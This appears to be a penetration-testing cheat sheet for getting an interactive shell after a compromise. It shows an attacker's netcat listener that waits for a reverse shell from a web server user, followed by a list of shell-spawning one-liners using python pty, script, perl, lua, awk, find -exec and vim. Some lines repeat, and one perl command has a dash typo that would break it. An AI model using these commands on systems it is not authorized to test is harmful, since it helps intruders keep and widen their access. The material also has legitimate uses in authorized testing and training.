# Attacker
nc -nlvp [PORT]
(...)
$ su admin
su: must be run from a terminal
# 1
/bin/bash
# 2
python -c "import pty; pty.spawn('/bin/bash')"
# 3
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/var/www/Magic/images$
# 4
perl -e 'exec "/bin/bash";'
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
sh: no job control in this shell
sh-4.2$
perl —e 'exec "/bin/sh";'
The command directly above should be run from a script.
The command directly above should be run from a script.
lua: os.execute('/bin/sh')
The command directly above should be run from a script.
awk 'BEGIN {system("/bin/sh")}'
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
vim
:set shell=/bin/sh
:shell
